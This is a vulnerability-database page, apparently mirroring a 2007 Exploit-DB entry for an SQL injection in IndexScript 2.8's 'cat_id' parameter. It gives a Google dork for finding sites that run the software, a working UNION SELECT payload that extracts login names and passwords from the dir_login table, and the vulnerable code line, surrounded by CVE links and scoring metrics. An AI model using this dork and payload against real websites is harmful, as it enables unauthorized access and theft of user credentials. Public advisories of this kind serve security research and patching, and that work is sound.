Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbXssvgamerEDB-ID:4225
HistoryJul 25, 2007 - 12:00 a.m.

IndexScript 2.8 - 'cat_id' SQL Injection

2007-07-2500:00:00
xssvgamer
www.exploit-db.com
31545

AI Score

7.4

Confidence

Low

EPSS

0.009

Percentile

83.3%

JSON
Site: http://indexscript.com
Found By: xssvgamer

Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in indexscript..

Vul Code:
"$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
 "cat_id=" . fnpreparesql($_GET['cat_id']);"

# milw0rm.com [2007-07-25]

Related

cvelist 3
prion 3
cve 3
nvd 3
cvelist
cvelist
CVE-2007-4069
2007-07-30 17:00:00
CVE-2007-4163
2007-08-03 21:00:00
CVE-2008-6179
2009-02-19 18:00:00
prion
prion
Sql injection
2007-07-30 17:30:00
Sql injection
2009-02-19 18:30:00
Sql injection
2007-08-03 21:17:00
cve
cve
CVE-2007-4069
2007-07-30 17:30:00
CVE-2007-4163
2007-08-03 21:17:00
CVE-2008-6179
2009-02-19 18:30:00
nvd
nvd
CVE-2007-4069
2007-07-30 17:30:00
CVE-2007-4163
2007-08-03 21:17:00
CVE-2008-6179
2009-02-19 18:30:00

AI Score

7.4

Confidence

Low

EPSS

0.009

Percentile

83.3%

JSON
Related for EDB-ID:4225
cvelist3prion3cve3nvd3